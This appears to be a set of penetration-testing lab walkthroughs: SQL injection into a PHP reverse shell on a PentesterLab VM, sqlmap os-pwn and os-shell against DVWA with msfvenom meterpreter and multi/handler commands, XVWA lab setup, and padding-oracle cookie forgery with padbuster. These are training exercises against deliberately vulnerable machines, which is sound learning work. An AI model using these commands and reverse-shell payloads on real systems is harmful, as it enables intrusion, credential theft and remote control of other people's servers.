Hack the Pentester Lab: from SQL injection to Shell VM

Hello friends!! Today we are going to solve another CTF challenge “From SQL injection to Shell I”. This VM is developed by Pentester Lab.  You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell,80/

Install the iso image in VM ware and start it. The task given in this lab is to gain access of administration console and upload PHP webshell.

Level: Beginner

Penetrating Methodologies

·         Network Scanning (Nmap)

·         Vulnerable to Error Base SQL Injection

·         Exploiting SQL Injection (SQLMAP)

·         Uploading Web shell

·         Spawning Shell (Netcat)

Walkthrough

The target holds 192.168.1.103 as network IP; now using nmap lets find out open ports.

nmap -A 192.168.1.103

Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on test.

The above URL: http://192.168.1.103/cat.php?id=1 will run query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding ‘ at last of URL:

http://192.168.1.103/cat.php?id=1'

sqlmap -u 192.168.1.103/cat.php?id=1 --dbs --batch

If you remembered the title of web page was “An Awesome Photoblog” hence name of database should be photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap –u 192.168.1.103/cat.php?id=1 –D photoblog --dump-all --batch

The first task was to gain access of administration console for which we required the login: password of his account. Through sqlmap command we have got login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now the last task is to upload PHP webshell. Under administration console you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload image.

Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php

Open it with text editor and add listening IP and port to get reverse connection of victim’s machine and save this file with php extension. Then launch netcat listener at listening port.

nc -lvp 1234

Then I uploaded our malicious PHP script.

It gives error NO PHP!! It means there is some whitelist for filtering PHP/php extension. 

Then I rename the malicious script as shell.pHP and try to upload it again.

Now you can perceive that a new row is added as shell which contains our backdoor shell.pHP, now to execute backdoor click on shell and you will get reverse connection at netcat.

Wonderful!!! We completed our last challenge also here we have spawned victim web shell.

Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn)

This artilce is about how to use sqlmap for sql injection to hack victim pc and gain shell access. Here I had perform sql attack to gain three different type of  shell (meterpreter; command shell; VNC )

 Requirement:

Xampp/Wamp Server                                                                                                           

DVWA Lab

Kali Linux: Burp suite, sqlmap tool 

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  

Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will be used later  in sqlmap commands.

Lets enumerate all databases name using “referrer and cookies” under sqlmap command.

sqlmap -u “http://192.168.1.79:81/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47 ″  --dbs

It has dumped all names of database. Now I am going to choose dvwa to access its back-end database management system.

Now type following command to access shell of web server and follow the screenshot.

sqlmap -u “http://192.168.1.79:81/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47 ″ -D dvwa --os-pwn

Type 1 for metasploit framework to establish a reverse connection then type 4 for php payload for supporting server and again type 1 for common location for writable directory to upload payload as backdoor in victim PC.

Here Type 1 for reverse tcp connection as default option. Now I will choose these entire three payloads one by one and try to hack web server every time. Now type 1 for meterpreter

It will load metasploit framework and provides meterpreter session 1.

Repeat the whole process till reverse tcp connection when further it ask to choose payload, then type 2 for shell.

Again it will load metasploit framework and provides command shell session 1.

Repeat the whole process till reverse tcp connection when further it ask to choose payload, this time now type 3 for VNC.

Again it will load metasploit framework and launchVNC viewer.

Here you can see from the given  screenshot that I had access victim pc through tightVNC and now victims each moment will be kept under my observation. Hence we have hacked victim pc three times with various type shell.

Web Penetration Testing Lab setup using XVWA

XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. It’s not advisable to host this application online as it is designed to be “Xtremely Vulnerable”. We recommend hosting this application in local/controlled environment and sharpening your application security ninja skills with any tools of your own choice. It’s totally legal to break or hack into this. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose.

XVWA is designed to understand following security issues.

·         SQL Injection – Error Based

·         SQL Injection – Blind

·         OS Command Injection

·         XPATH Injection

·         Formula Injection

·         PHP Object Injection

·         Unrestricted File Upload

·         Reflected Cross Site Scripting

·         Stored Cross Site Scripting

·         DOM Based Cross Site Scripting

·         Server Side Request Forgery (Cross Site Port Attacks)

·         File Inclusion

·         Session Issues

·         Insecure Direct Object Reference

·         Missing Functional Level Access Control

·         Cross Site Request Forgery (CSRF)

·         Cryptography

·         Unvalidated Redirect & Forwards

·         Server Side Template Injection

 Configuration of XVWA lab on windows is totally same as BWAPP . I am using xamp so let’s configure this lab under xampp server, firstly download xvwa from here

Now Extract XVWA lab setup in the location” C:\xampp\htdocs\” as is shown below and change the name of folder as xvwa.

Open folder xvwa to access its config file. Then open the php file” config” for configuration of xvwa to make it run on localhost server.

Here you need to make several changes in given below screenshot of config file.

Remove “/var/www/html” from XVWA_WEBROOT; remove “xvwa” under dbname; replace “localhost” from “127.0.0.1” then save the php file without changing its name at same location. Get more help from given screeshot of “config” after making above changes.

Next open php configuration setting file please look over image given below

Make several changes again by editing on for all three settings.

Now time to run XVWA on browser; type URL: 127.0.0.1:81/xvwa and you’ll get this kind of web page of xvwa which consist of many attacks.

Meterpreter Shell uploading in DVWA with SQl Injection

This article is exactly same as previous article; today I will make use of sqlmap to upload backdoor filein DVWA suffering from sql injection vulnerbility.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  

Turn on burp suite click on proxy in menu bar and go for intercept is on button. Come back and click on submit button in dvwa. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.

In following Sqlmap will analysis the url for making connection from target and then use sql queries for given cookies to fetch all names of database.

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47; security_level=0″  --dbs

So if you notice image given below it has dumb all name of database. Choose dvwa to upload php backdoor.

Now Type following command to run sqlmap to access os-shell of web server (dvwa)

sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit” --cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47; security_level=0″  -D dvwa –os-shell

It will try to generate a backdoor; I want to create PHP backdoor in target pc therefore type 4 for PHP payload and then Type 4 for brute force search to use as writable directory to upload

It is trying to upload the file on “/xampp/htdocs/” by using different sql injection techniques. As soon as file is uploaded; it will send INFO the file stager has been successfully uploaded on “/xampp/htdocs/”and you will get os-shell of victim pc. Other than here it also shows the path where

you can manually upload your backdoor, look at over highlighted URL:

http://192.168.0.102/tmpunias.php

Explore the URL:http://192.168.0.102/tmpunais.php on browser. From screenshot you can read the heading of web page sqlmap file uploader which will let you to browse you backdoor on web server(dvwa) and will later upload that backdoor to following directory (“/xampp/htdocs/” )of web server.

Let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw. 

copy the code from 

Now load metasploit framework by typing msfconsole and start multi/handler

Click on browse to select your shell.php file and then click on upload.

GREAT!!!  Here it shows Admin File is uploaded which means backdoor shell.php is uploaded.

To execute backdoor on target pc run URL:192.168.0.102/shell.php on browser and you will receive reverse connection to multi/handler.

msf> use multi/handler

msf exploit(handler) > set lport 4444

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > exploit

meterpreter>sysinfo

Divine!!!  meterpreter session is opened .

Hack Padding Oracle Lab (CTF Challenge)

The main purpose to solve this lab was to share the padding oracle attack technique with our visitors

The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key and used cipher by sending skillful manipulated cipher texts to the padding oracle and observing of the results returned by it. This causes loss of confidentiality of the encrypted data. E.g. in the case of session data stored on the client side the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plain texts without knowledge of the used key and cipher. If the application assumes that integrity and authenticity of the decrypted data is given, an attacker could be able to manipulate internal session state and possibly gain higher privileges.

www.owasp.org/index.php/Testing_for_Padding_Oracle

 First you need to download padding oracle from here. Now install the iso image in VM ware and start it.

Start kali Linux as well as explore target IP: 192.168.1.29 on browser. Now at this point you need to create a user account, click on register option.

Now register username with its password and then login to exploit this vulnerability. I registered as raj: 123

Once you create a user account get on login panel and at the same time make use of burp suite to capture the cookies.

Turn up burp suite and don’t forget to set manual proxy of your browser. Now open proxy tab and hit intercepts on button to capture the request of target. When this is done you will get fetched data under intercept window. Here you will find that I try to login with credential raj: 123

Now right click on its window and a list of options will appear. Further click on send to repeater. Come across over screenshot here you will find two panel left and right for request and response respectively.

In left panel send username: raj and password: 123 as request; click on GO button to forward this request and which will further generate a cookie for auth as response in right panel.

Copy the highlighted cookie and this will be use in below command.

Next open terminal to run following command which contains target URL plus above copied cookie

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0

Python-paddingoracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science. Above command will decrypt the encrypted value of auth into plaintext. Further type 2 where it asked ID recommended.

Last part of screenshot has captured three decrypt values in base64, HEX and ASCII. The cookie of auth is combination of username with its password from padbuster we come to know what is encrypted value of username for raj.

We are very near to our goal just encrypt this auth cookie with user as admin once again. Here we have our plaintext as admin and lets encode it using padbuster.

padbuster http://192.168.1.102/login.php wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG 8 --cookies auth=wJRTrRORayKbhI2aKPHxniQ6DEAHi7WG --encoding 0 –plaintext user=admin

Further type 2 where it asked ID recommended.

Here the highlighted part is our encrypted value for admin. Copy It”BAit--------AAAA”.

Go to burp suit once again and click on params under intercept frame; it contains two fields as username and password, now add third field for auth value. Click on ADD button on the right side of frame which will add another row in params. 

Here it has three columns: type, name, and value; paste the above encrypted value in these columns as type: cookie, name: auth, value: BAit------AAAAAA which we have got from padbuster. Then Click on forward to send this request on web server.

Again click on forward to send it.

As request sent by burp suite automatically on web server you will get logged in as admin account.

Congrats!!! We meet the goal of this lab.